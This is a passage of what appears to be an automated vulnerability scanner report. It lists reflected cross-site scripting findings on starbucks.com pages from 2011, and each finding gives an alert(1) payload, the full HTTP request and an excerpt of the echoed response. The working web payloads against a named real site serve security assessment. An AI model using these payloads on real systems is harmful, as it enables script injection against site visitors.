2.286. http://www.starbucks.com/menu/nutrition/35-under-350 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/nutrition/35-under-350

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4d273"style%3d"x%3aexpression(alert(1))"805418c9f1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 4d273"style="x:expression(alert(1))"805418c9f1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/nutrition/35-under-350?4d273"style%3d"x%3aexpression(alert(1))"805418c9f1=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:08:42 GMT
Connection: close
Content-Length: 40944

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/nutrition/35-under-350?4d273"style="x:expression(alert(1))"805418c9f1=1"/>
...[SNIP]...

2.287. http://www.starbucks.com/responsibility [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /responsibility

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d09aa"style%3d"x%3aexpression(alert(1))"81477c5bd4b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d09aa"style="x:expression(alert(1))"81477c5bd4b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /responsibility?d09aa"style%3d"x%3aexpression(alert(1))"81477c5bd4b=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:13:26 GMT
Connection: close
Content-Length: 60882

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/responsibility?d09aa"style="x:expression(alert(1))"81477c5bd4b=1" />
...[SNIP]...

2.288. http://www.starbucks.com/responsibility [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /responsibility

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 82ef5"%3balert(1)//49dd8543659 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 82ef5";alert(1)//49dd8543659 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /responsibility?82ef5"%3balert(1)//49dd8543659=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:13:28 GMT
Connection: close
Content-Length: 60787

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
xt/javascript">
   var flashvars = {};
   flashvars.playerType = "category";
   flashvars.playlistID = "96759748001";
   flashvars.playerLocation = "http://www.starbucks.com/responsibility?82ef5";alert(1)//49dd8543659=1";
   var params = {};
   params.loop = "false";
   params.quality = "best";
   params.scale = "exactfit";
   params.wmode = "transparent";
   params.allowscriptaccess = "always";

...[SNIP]...

2.289. http://www.starbucks.com/responsibility/community [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /responsibility/community

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 372ca"style%3d"x%3aexpression(alert(1))"73e95ed1bd6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 372ca"style="x:expression(alert(1))"73e95ed1bd6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /responsibility/community?372ca"style%3d"x%3aexpression(alert(1))"73e95ed1bd6=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:13:40 GMT
Connection: close
Content-Length: 40476

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/responsibility/community?372ca"style="x:expression(alert(1))"73e95ed1bd6=1"/>
...[SNIP]...

2.290. http://www.starbucks.com/responsibility/community/community-service [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /responsibility/community/community-service

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 656dc"style%3d"x%3aexpression(alert(1))"0bb7acaed5f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 656dc"style="x:expression(alert(1))"0bb7acaed5f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /responsibility/community/community-service?656dc"style%3d"x%3aexpression(alert(1))"0bb7acaed5f=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:14:03 GMT
Connection: close
Content-Length: 37533

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/responsibility/community/community-service?656dc"style="x:expression(alert(1))"0bb7acaed5f=1"/>
...[SNIP]...

2.291. http://www.starbucks.com/responsibility/community/ethos-water-fund [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /responsibility/community/ethos-water-fund

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 81e52"style%3d"x%3aexpression(alert(1))"55e877cb972 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 81e52"style="x:expression(alert(1))"55e877cb972 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /responsibility/community/ethos-water-fund?81e52"style%3d"x%3aexpression(alert(1))"55e877cb972=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:14:36 GMT
Connection: close
Content-Length: 36863

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/responsibility/community/ethos-water-fund?81e52"style="x:expression(alert(1))"55e877cb972=1"/>
...[SNIP]...

2.292. http://www.starbucks.com/responsibility/community/starbucks-foundation [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /responsibility/community/starbucks-foundation

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 711af"style%3d"x%3aexpression(alert(1))"aa02c4b265c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 711af"style="x:expression(alert(1))"aa02c4b265c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /responsibility/community/starbucks-foundation?711af"style%3d"x%3aexpression(alert(1))"aa02c4b265c=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:14:29 GMT
Connection: close
Content-Length: 39409

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/responsibility/community/starbucks-foundation?711af"style="x:expression(alert(1))"aa02c4b265c=1"/>
...[SNIP]...

2.293. http://www.starbucks.com/responsibility/community/starbucks-red [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /responsibility/community/starbucks-red

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7705d"style%3d"x%3aexpression(alert(1))"c7aa8f5b401 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 7705d"style="x:expression(alert(1))"c7aa8f5b401 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /responsibility/community/starbucks-red?7705d"style%3d"x%3aexpression(alert(1))"c7aa8f5b401=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:14:17 GMT
Connection: close
Content-Length: 41929

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/responsibility/community/starbucks-red?7705d"style="x:expression(alert(1))"c7aa8f5b401=1"/>
...[SNIP]...

2.294. http://www.starbucks.com/responsibility/community/starbucks-red [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /responsibility/community/starbucks-red

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3411b"%3balert(1)//7724a630612 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 3411b";alert(1)//7724a630612 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /responsibility/community/starbucks-red?3411b"%3balert(1)//7724a630612=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:14:20 GMT
Connection: close
Content-Length: 41834

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
r flashvars = {};
   flashvars.playerType = "category";
   flashvars.playlistID = "96759750001";
   flashvars.playerLocation = "http://www.starbucks.com/responsibility/community/starbucks-red?3411b";alert(1)//7724a630612=1";
   var params = {};
   params.loop = "false";
   params.quality = "best";
   params.scale = "exactfit";
   params.wmode = "transparent";
   params.allowscriptaccess = "always";

...[SNIP]...

2.295. http://www.starbucks.com/responsibility/community/youth-action [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /responsibility/community/youth-action

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6c5f1"style%3d"x%3aexpression(alert(1))"fee707305da was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6c5f1"style="x:expression(alert(1))"fee707305da in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /responsibility/community/youth-action?6c5f1"style%3d"x%3aexpression(alert(1))"fee707305da=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:14:25 GMT
Connection: close
Content-Length: 40145

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/responsibility/community/youth-action?6c5f1"style="x:expression(alert(1))"fee707305da=1"/>
...[SNIP]...

2.296. http://www.starbucks.com/responsibility/community/youth-action [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /responsibility/community/youth-action

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6bc26"%3balert(1)//a20621fb850 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6bc26";alert(1)//a20621fb850 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /responsibility/community/youth-action?6bc26"%3balert(1)//a20621fb850=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:14:26 GMT
Connection: close
Content-Length: 40050

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
ar flashvars = {};
   flashvars.playerType = "category";
   flashvars.playlistID = "96890010001";
   flashvars.playerLocation = "http://www.starbucks.com/responsibility/community/youth-action?6bc26";alert(1)//a20621fb850=1";
   var params = {};
   params.loop = "false";
   params.quality = "best";
   params.scale = "exactfit";
   params.wmode = "transparent";
   params.allowscriptaccess = "always";

...[SNIP]...

2.297. http://www.starbucks.com/responsibility/diversity [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /responsibility/diversity

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b2434"style%3d"x%3aexpression(alert(1))"9d972ae0d9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b2434"style="x:expression(alert(1))"9d972ae0d9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /responsibility/diversity?b2434"style%3d"x%3aexpression(alert(1))"9d972ae0d9=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:16:54 GMT
Connection: close
Content-Length: 38155

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/responsibility/diversity?b2434"style="x:expression(alert(1))"9d972ae0d9=1"/>
...[SNIP]...

2.298. http://www.starbucks.com/responsibility/diversity/suppliers [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /responsibility/diversity/suppliers

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2ab1f"style%3d"x%3aexpression(alert(1))"18d18debd9f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2ab1f"style="x:expression(alert(1))"18d18debd9f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /responsibility/diversity/suppliers?2ab1f"style%3d"x%3aexpression(alert(1))"18d18debd9f=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:17:09 GMT
Connection: close
Content-Length: 39052

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/responsibility/diversity/suppliers?2ab1f"style="x:expression(alert(1))"18d18debd9f=1" />
...[SNIP]...

2.299. http://www.starbucks.com/responsibility/environment [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /responsibility/environment

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 74254"style%3d"x%3aexpression(alert(1))"cd978537e36 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 74254"style="x:expression(alert(1))"cd978537e36 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /responsibility/environment?74254"style%3d"x%3aexpression(alert(1))"cd978537e36=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:15:58 GMT
Connection: close
Content-Length: 50714

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/responsibility/environment?74254"style="x:expression(alert(1))"cd978537e36=1"/>
...[SNIP]...

2.300. http://www.starbucks.com/responsibility/environment/climate-change [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /responsibility/environment/climate-change

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8714c"style%3d"x%3aexpression(alert(1))"f8e10288012 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8714c"style="x:expression(alert(1))"f8e10288012 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /responsibility/environment/climate-change?8714c"style%3d"x%3aexpression(alert(1))"f8e10288012=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
